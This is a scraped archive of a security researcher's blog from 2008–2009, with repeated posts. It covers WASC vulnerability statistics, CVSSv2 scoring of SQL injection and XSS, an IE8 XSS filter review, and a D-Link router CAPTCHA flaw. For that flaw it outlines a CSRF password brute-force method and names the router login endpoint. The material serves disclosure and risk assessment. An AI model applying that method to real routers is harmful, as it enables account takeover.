The Web Application Security Consortium (WASC) is pleased to announce the WASC Web Application Security Statistics Project 2008. This initiative is a collaborative industry wide effort to pool together sanitized website vulnerability data and to gain a better understanding about the web application vulnerability landscape. We ascertain which classes of attacks are the most prevalent regardless of the methodology used to identify them. Industry statistics such as those compiled by Mitre CVE project provide valuable insight into the types of vulnerabilities discovered in open source and commercial applications, this project tries to be the equivalent for custom web applications.
This article contains Web application vulnerability statistics which was collected during penetration testing, security audits and other activities made by companies which were members of WASC in 2008. The statistics includes data about 12186 sites with 97554 detected vulnerabilities.
WASC Web Application Security Statistics 2008
Download.
Показаны сообщения с ярлыком reaserch. Показать все сообщения
Показаны сообщения с ярлыком reaserch. Показать все сообщения
понедельник, 19 октября 2009 г.
среда, 3 июня 2009 г.
Add protection means add “a hole”
Funny news
New D-Link protection for Wi-Fi routers is a hole in security!
D-Link had barely announced updated firmware for wireless routers with protection from automatic registrations (CAPTCHA), when several enthusiasts found out that this new protection measures make routers more vulnerable to password theft.
http://www.securitylab.ru/news/379779.php
Details:
http://www.sourcesec.com/2009/05/12/d-link-captcha-partially-broken/
There are some comments on SecurityLab forum that say:
Is it again an attack with default password?
The situation is much more amusing, indeed. The problem is that CAPTCHA is used by D-Link to protect from Cross-Site Request Forgery (CSRF) which (to be more precise, exploitation method for a router) was greatly named Drive-by Pharming by Symantec. But implementation error (accepting of requests with valid hash without CAPTCHA) makes this protection to be a vulnerability.
If passwords are standard then there is a method to bypass basic authentication via Javscript (see "Breaking through the perimeter" http://www.securitylab.ru/analytics/292473.php ).
But if the password (or its derivative such as hash) is sent to GET (as Basic duplicate), then the situation is more interesting – an attacker could use not only standard password hash but also conduct user password brute force attack Javascript via CSRF from which CAPTCHA should protect.
It means that the vulnerability concerns not only standard passwords but also could increase the effectiveness of user password brute force attacks via CSRF, and standard password security (timeout, temporary lockout, etc.) does not work as not brute force itself but attempts to connect with different “normal” hashes are taken, used instead of session identifier. A simple script is enough for it, that call the address
GET /post_login.xml?hash=
and check whether the action was successful. The point is to trick a user to open the site:)
In general, rather interesting design error in authentication mechanism of web application.
New D-Link protection for Wi-Fi routers is a hole in security!
D-Link had barely announced updated firmware for wireless routers with protection from automatic registrations (CAPTCHA), when several enthusiasts found out that this new protection measures make routers more vulnerable to password theft.
http://www.securitylab.ru/news/379779.php
Details:
http://www.sourcesec.com/2009/05/12/d-link-captcha-partially-broken/
There are some comments on SecurityLab forum that say:
Is it again an attack with default password?
The situation is much more amusing, indeed. The problem is that CAPTCHA is used by D-Link to protect from Cross-Site Request Forgery (CSRF) which (to be more precise, exploitation method for a router) was greatly named Drive-by Pharming by Symantec. But implementation error (accepting of requests with valid hash without CAPTCHA) makes this protection to be a vulnerability.
If passwords are standard then there is a method to bypass basic authentication via Javscript (see "Breaking through the perimeter" http://www.securitylab.ru/analytics/292473.php ).
But if the password (or its derivative such as hash) is sent to GET (as Basic duplicate), then the situation is more interesting – an attacker could use not only standard password hash but also conduct user password brute force attack Javascript via CSRF from which CAPTCHA should protect.
It means that the vulnerability concerns not only standard passwords but also could increase the effectiveness of user password brute force attacks via CSRF, and standard password security (timeout, temporary lockout, etc.) does not work as not brute force itself but attempts to connect with different “normal” hashes are taken, used instead of session identifier. A simple script is enough for it, that call the address
GET /post_login.xml?hash=
and check whether the action was successful. The point is to trick a user to open the site:)
In general, rather interesting design error in authentication mechanism of web application.
четверг, 19 марта 2009 г.
Webspider. Express vulnerability assesment
Concept preview of Webspider express security scanner (pure AJAX :) has been recently published – this is a tool that allows analyzing in seconds the software which is the most frequently used by attackers. The system is intended to make protection express analysis of Internet and Intranet users, users of electronic commerce systems and Internet provider clients.
You can test it here:
http://www.securitylab.ru/addons/webspider3/fast_check.php

The current version is able to detect a vulnerability in popular ActiveX components and plug-ins, Mozilla Firefox and Opera browsers, Java and Adobe Flash applications and also MS07-042, MS08-069 and MS09-002 updates.
We plan to publish a detailed article about the used techniques in April.
It's just preview, so be indulgently.
You can test it here:
http://www.securitylab.ru/addons/webspider3/fast_check.php

The current version is able to detect a vulnerability in popular ActiveX components and plug-ins, Mozilla Firefox and Opera browsers, Java and Adobe Flash applications and also MS07-042, MS08-069 and MS09-002 updates.
We plan to publish a detailed article about the used techniques in April.
It's just preview, so be indulgently.
Ярлыки:
Positive Technologies,
reaserch,
tools,
Web
вторник, 10 марта 2009 г.
Positive Technologies Reasearch Lab
This year we decided to resume the publication of vulnerability details detected during researches and penetration testing.
http://en.securitylab.ru/lab/
In 2006, because of a number of reasons, we decided to shift the burden of publishing vulnerability details to software vendors and stop publishing the details about previously detected problems. However, many customers ask us to assist in vulnerability elimination in third-party vendor software. This induces us to resume the process.
The most interesting current problem (in my opinion) is a number of vulnerabilities in VMWare that allows attackers to gain access from guest to host OS. And right to the kernel.
I personally treated different methods to eliminate vulnerabilities in third-party vendor software, from Full-Disclosure extremism to selling vulnerabilities in the “white” market, for example, iDefense (http://labs.idefense.com/vcp/). Some thought are available here:
http://www.securitylab.ru/analytics/241826.php (Russian)
http://en.securitylab.ru/lab/
In 2006, because of a number of reasons, we decided to shift the burden of publishing vulnerability details to software vendors and stop publishing the details about previously detected problems. However, many customers ask us to assist in vulnerability elimination in third-party vendor software. This induces us to resume the process.
The most interesting current problem (in my opinion) is a number of vulnerabilities in VMWare that allows attackers to gain access from guest to host OS. And right to the kernel.
I personally treated different methods to eliminate vulnerabilities in third-party vendor software, from Full-Disclosure extremism to selling vulnerabilities in the “white” market, for example, iDefense (http://labs.idefense.com/vcp/). Some thought are available here:
http://www.securitylab.ru/analytics/241826.php (Russian)
Ярлыки:
pentest,
Positive Technologies,
reaserch
понедельник, 26 января 2009 г.
Risks, risks, risks
I came across with vulnerabilities in UTM device management web interface during security analysis recently. Rather typical combination of CSRF and XSS is interesting because it allows attackers to get access to device command line and manage the system interactively in administrator’s browser. But this is not the whole point, the vulnerability is typicaly.
The most interesting (as always) was communication with the vendor. We did not agree about the vulnerability risk level that led to desperate correspondence. Here I would like to share with you our ideas in this field.
As a rule, risk level is set by software vendor or by a company that produces protection tools (vulnerability scanners, intrusion detection systems, etc.). In this case typical scheme similar to road regulations is used: low risk level (green), medium risk level (yellow), high risk level (red). Sometimes an additional 4th level is used – level of critical vulnerabilities.
Many producers use this approach, for example, Microsoft uses 4 vulnerability risk levels in its security bulletins.
But ‘traffic lights’ model is not transparent and greatly depends on expert world view and general state and other factors. That’s why we use CVSSv2 methodology.
English
http://www.first.org/cvss/cvss-guide.html
Russian
http://www.securitylab.ru/analytics/355336.php
http://www.securitylab.ru/analytics/356476.php
Rather simple metrics on which CVSSv2 is based allows assessing risks more or less definitely. In addition, the metrics allows assessing several additional factors as exploitation possibility and environment that is very important.
Quotation (Russian):
The most interesting (as always) was communication with the vendor. We did not agree about the vulnerability risk level that led to desperate correspondence. Here I would like to share with you our ideas in this field.
As a rule, risk level is set by software vendor or by a company that produces protection tools (vulnerability scanners, intrusion detection systems, etc.). In this case typical scheme similar to road regulations is used: low risk level (green), medium risk level (yellow), high risk level (red). Sometimes an additional 4th level is used – level of critical vulnerabilities.
Many producers use this approach, for example, Microsoft uses 4 vulnerability risk levels in its security bulletins.
But ‘traffic lights’ model is not transparent and greatly depends on expert world view and general state and other factors. That’s why we use CVSSv2 methodology.
English
http://www.first.org/cvss/cvss-guide.html
Russian
http://www.securitylab.ru/analytics/355336.php
http://www.securitylab.ru/analytics/356476.php
Rather simple metrics on which CVSSv2 is based allows assessing risks more or less definitely. In addition, the metrics allows assessing several additional factors as exploitation possibility and environment that is very important.
Quotation (Russian):
Leaving aside advantages and disadvantages of the methods, the following characteristics could affect the assessment reliability:
- Context dependence;
- System configuration dependence;
- Assessment method dependence.
Vulnerabilities of the same type could be of different risk level in different applications. For example, CSRF vulnerability could not be a threat for typical representation server or search engine, but is a critical vulnerability for e-mail or payment system web interface. As a result of information leakage, an attacker could access application logs (low or medium risk level) or download the backup copy of the site (high risk level).
The system configuration could also affect the risk level. Thus, “SQL Injection” vulnerability is usually classified as a high risk level vulnerability. But if web application has restricted rights on DB server, it is a vulnerability of medium or low risk level. In another installation or implementation the same vulnerability could be used to access operating system with superuser rights that makes the vulnerability critical.
Assessment methods greatly affect vulnerability risk level. For the above example, a network scanner could just detect “SQL Injection” as a problem. To determine the available for potential attackers privileges one should try to use the vulnerability or get detailed information about communications between web application and DB server via white box method.
So it is absolutely incorrect to give to different vulnerabilities of the same type equal risk levels without detailed analysis (for example, SQL Injection).
Here is an example.
Let’s assume that SQL Injection allows to get access to DBMS with minimum web server privileges, for example, db_reader. And web application does not store confidential data (for example, passwords) in DBMS.
So CVSSv2 vector and risk level are:
In the other case, if user passwords are stored in DBMS (including administrator password), risk level is higher as the system is more vulnerable to attacks according to data confidentiality.
(AV:N/AC:L/Au:N/C:C/I:N/A:P/E:H/RL:W/RC:C)= 8.1
If web server has unreasonably extended privileges on DB server, for example, sa privileges, the same vulnerability is much more dangerous:
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:W/RC:C) = 9.5
It we reduce it into “traffic lights” model or PCI DSS 5 levels (Urgent, Critical, High, Medium, Low), the result is:
1. Medium (2) and High (3)
2. Medium (2) and Critical (4)
3. High (3) and Urgent (>4).
It means that vulnerability risk level could vary greatly depending on the system and its settings.
CVSSv2 vector for XSS (see description above at the beginning of the note)
(AV:N/AC:H/Au:N/C:C/I:C/A:C/E:F/RL:W/RC:C) = 6.9
So in terms of PCI DSS (it is this model that is the most popular now) the risk level of the issue is High or even Critical, but not Low. But in any case the audit is failed :))
PS. I can understand vendor’s reasons, as if security is not taken into account when the software is designed then (quotation) "hardening the management interface would probably imply a complete redesign of it".
Here it is – the various risk assessment.
понедельник, 24 ноября 2008 г.
IE 8 and XSS
Here are the results of analysis of XSS filter built in current beta Internet Explorer 8. Colleagues from Microsoft have achieved rather good results – the most widespread attack vectors for the vulnerability are blocked.
It is funny that the different vulnerability (HTTP Response Splitting) was detected that allows attackers to disable XSS protection. I hope the problem will be solved in the release version.
If we take into account that XSS is the most widespread Web problem according to both Positive Technologies and international WASC statistics, the existence of such mechanisms in browsers is a useful initiative. I think Avir/HIPS developers should also care about this area.
There is a contracted summery below about filter efficiency against different attack vectors:
There is a contracted summery below about filter efficiency against different attack vectors:
Stored version | No |
DOM-Based | Partly |
Reversed version | |
In tag | No |
In Javascript | No |
In HTML | Yes |
In tag parameter | Yes |
It is funny that the different vulnerability (HTTP Response Splitting) was detected that allows attackers to disable XSS protection. I hope the problem will be solved in the release version.
Подписаться на:
Сообщения (Atom)